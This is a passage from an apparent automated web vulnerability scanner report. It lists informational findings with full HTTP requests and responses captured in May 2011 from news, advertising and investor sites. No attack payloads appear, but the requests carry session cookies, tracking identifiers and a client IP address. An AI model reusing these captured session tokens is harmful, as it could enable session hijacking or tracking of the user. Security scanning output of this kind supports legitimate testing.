Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iLxqaLMH07l000001jlP8aJjE0dpH00001iVAyaL8w0clo00001jpdKaLsn073a00002iRpfaL7W0c9M00001jz2OaLMO0cEf00001juYhaL6q07Kl00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001iLaRaL9K0bnA00001jBofaIOs07Si00001jAsGaJH602WG00003jelLaL7W07pd00002iRoBaLsa0c9M00001isyIaL8z02WG00001; B3=9qGw0000000002uz9wtb0000000001ur8Whx0000000003uu82s80000000002uy9oDg0000000001ut97QM0000000001uA9vHV0000000001uA9X5k0000000001uA910k0000000001uz98nW0000000001uy910n0000000001uy9c210000000002uy96EU0000000001uy8SAT0000000001uy9yEe0000000001uA9yEg0000000001uA7dOu0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iVAyaL8w0clo00001jlP8aJjE0dpH00001iLxqaLMH07l000001iLznaM7707l000001jz2OaLMO0cEf00001iRpfaL7W0c9M00001jpdKaLsn073a00002juYhaL6q07Kl00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001jelLaL7W07pd00002jAsGaJH602WG00003jBofaIOs07Si00001iLaRaL9K0bnA00001iRoBaLsa0c9M00001isyIaL8z02WG00001; expires=Wed, 10-Aug-2011 07:03:16 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=82s80000000002uy8Whx0000000003uu9wtb0000000001ur9qGw0000000002uz9oDg0000000001ut97QM0000000001uA97QP0000000001uB9vHV0000000001uA910k0000000001uz9X5k0000000001uA910n0000000001uy98nW0000000001uy9c210000000002uy9yEe0000000001uA8SAT0000000001uy96EU0000000001uy7dOu0000000001uy9yEg0000000001uA; expires=Wed, 10-Aug-2011 07:03:16 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 11:03:15 GMT
Connection: close
Content-Length: 1885

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

27.15. http://dealbook.nytimes.com/svc/timespeople/bell.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /svc/timespeople/bell.html

Request

GET /svc/timespeople/bell.html HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Referer: http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html?url=%2Fsvc%2Ftimespeople%2Ftoolbar%2F1.0%2Fuser%3Fpage_url%3Dhttp%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&method=get&params=&bell=http://dealbook.nytimes.com/svc/timespeople/bell.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:12 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 54

<!-- This file is used by NewsPeple. Do not delete -->

27.16. https://investor.kkr.com/investor/login.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://investor.kkr.com
Path:   /investor/login.html

Request

GET /investor/login.html HTTP/1.1
Host: investor.kkr.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 75
Content-Type: text/html
Last-Modified: Wed, 29 Oct 2008 18:28:38 GMT
Accept-Ranges: bytes
ETag: "25223e29f439c91:1787"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:06:41 GMT

<body><script>
location.href="https://investor.kkr.com";
</script></body>

27.17. http://js.adsonar.com/js/pass.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.adsonar.com
Path:   /js/pass.html

Request

GET /js/pass.html?cb=30305 HTTP/1.1
Host: js.adsonar.com
Proxy-Connection: keep-alive
Referer: http://cdn.tacoda.at.atwola.com/an/qseg.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 23 Nov 2010 14:44:54 GMT
ETag: "5ab-495b96a6f2580"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html
Cache-Control: max-age=1677
Expires: Thu, 12 May 2011 12:07:17 GMT
Date: Thu, 12 May 2011 11:39:20 GMT
Connection: close
Content-Length: 1451

<html><body><script type="text/javascript">
window.onerror=errorHandle;function errorHandle(e){return true;}var d=location.hash;if(d){var c=document.cookie;if(c.length==0||(c.length>0&&c.indexOf("oo_
...[SNIP]...

27.18. http://markets.on.nytimes.com/research/modules/dealbook_2010/dealbook.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://markets.on.nytimes.com
Path:   /research/modules/dealbook_2010/dealbook.asp

Request

GET /research/modules/dealbook_2010/dealbook.asp?18 HTTP/1.1
Host: markets.on.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 11:03:51 GMT
Content-Length: 12169
Content-Type: text/html
Expires: Thu, 12 May 2011 11:02:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Set-Cookie: 1977%5F0=A65E7F62E7765BC47864BFFE807574BD; path=/


try { // cache bg imgs in IE
   document.execCommand("BackgroundImageCache", false, true);
} catch(err) {}
var currentRegion = 'TopMovers';
function changeRegion(region){
   document.getElementById
...[SNIP]...

27.19. http://odb.outbrain.com/utils/ping.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Request

GET /utils/ping.html?random=0.8784565008245409 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIxU/gzm6hl65Q=="; _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFKcF+HzHyRcQ=="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 11:38:43 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1304265382000"
Last-Modified: Sun, 01 May 2011 15:56:22 GMT
Content-Type: text/html
Content-Length: 158
Date: Thu, 12 May 2011 11:38:42 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

27.20. http://ping.chartbeat.net/ping

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.chartbeat.net
Path:   /ping

Request

GET /ping?h=bloomberg.com&p=%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&u=05vt53emlalrxzsu&d=bloomberg.com&g=15087&n=0&c=2.5&x=0&y=3619&w=964&j=150&R=0&W=0&I=1&b=29189&t=vamaxzkbswvn70xh&_ HTTP/1.1
Host: ping.chartbeat.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Referrer data required.
Server: nginx/0.7.67
Date: Thu, 12 May 2011 11:40:10 GMT
Content-Type: text/html
Connection: close
Content-Length: 146

<HTML><HEAD>
<TITLE>500 Referrer data required.</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

27.21. https://services.sungarddx.com/admin/GetExternMedia.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://services.sungarddx.com
Path:   /admin/GetExternMedia.aspx

Request

GET /admin/GetExternMedia.aspx?DN=161476,1,Documents&MediaGuid=b5c415d7-82b3-4f6f-88e6-32e0157b8f64 HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
Referer: https://services.sungarddx.com/default.aspx?DN=3483,1,Documents&CommunityDN=161476,1,Documents
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v; ASPSESSIONIDAQBBSCRR=EAGLHBFBJGMGAJGCNKJEJDGG

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 11:41:05 GMT
Content-Length: 2937

GIF89a=."...................................................................................................z..u..s..k..i..e..a.._.Z{.Vx.Ps.Lp.Im.Ci.@f.<c.7_.6^.1Z.+U.'R}#O{!Mz.Jw.Gu.Et.Aq.?o=n    :k.
...[SNIP]...

27.22. https://services.sungarddx.com/common/js/AdminFunctions.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://services.sungarddx.com
Path:   /common/js/AdminFunctions.asp

Request

GET /common/js/AdminFunctions.asp HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
Referer: https://services.sungarddx.com/Default.aspx?DN=1,Documents&URL=DN=161476,1,Documents
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v

Response

HTTP/1.1 200 OK
Cache-Control: PUBLIC
Content-Length: 6977
Content-Type: text/html
Expires: Thu, 12 May 2011 23:40:46 GMT
Last-Modified: Thu, 12 May 2011 11:40:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQBBSCRR=EAGLHBFBJGMGAJGCNKJEJDGG; path=/
Date: Thu, 12 May 2011 11:40:46 GMT


//<script language="javascript">
//<!--
///<summary>
///Misc administrative functions
///</summary>
///<scope>both</scope>


///<summary>
/// Used to get into the console and backend stuf
...[SNIP]...

27.23. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxbusiness/300x250/ros

Request

GET /ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2698
Content-Type: text/html
Date: Thu, 12 May 2011 11:39:09 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...

27.24. http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timespeople.nytimes.com
Path:   /packages/html/timespeople/xmlhttprequest.html

Request

GET /packages/html/timespeople/xmlhttprequest.html?url=%2Fsvc%2Ftimespeople%2Ftoolbar%2F1.0%2Fuser%3Fpage_url%3Dhttp%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&method=get&params=&bell=http://dealbook.nytimes.com/svc/timespeople/bell.html HTTP/1.1
Host: timespeople.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:16 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 385

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<title></title>
<script src="http://graphics8.nytimes.com/js/app/lib/json/json2-min.js" type="text/javascript" charset="utf-8
...[SNIP]...

27.25. http://topics.nytimes.com/adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00

Summary

Severity:   Information
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00

Request

GET /adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00 HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
Referer: http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; _chartbeat2=0b2fi2bgk284tw0q; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198956177:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; nyt-m=A61A961B774C8275E676733D3F0E8B0E&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.12.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:16:09 GMT
Content-type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 45

GIF89a.............!.......,..............X.;

27.26. http://topics.nytimes.com/adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc

Request

GET /adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
Referer: http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; _chartbeat2=0b2fi2bgk284tw0q; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200307534:ss=1305198204263; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*192f3=0:3|s*1935f=0:2|s*18a4b=0:2|s*1780a=0:3|s*2554b=0:2; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|H07707_10872|D08734_72078|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; nyt-m=FD213EE6971B98D7B9BD717BA7F666F0&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.18.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:38:31 GMT
Content-type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 45

GIF89a.............!.......,..............X.;

27.27. http://topics.nytimes.com/svc/timespeople/bell.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /svc/timespeople/bell.html

Request

GET /svc/timespeople/bell.html HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
Referer: http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html?url=%2Fsvc%2Ftimespeople%2Ftoolbar%2F1.0%2Fuser%3Fpage_url%3Dhttp%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&method=get&params=&bell=http://topics.nytimes.com/svc/timespeople/bell.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; _chartbeat2=0b2fi2bgk284tw0q; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198956177:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; 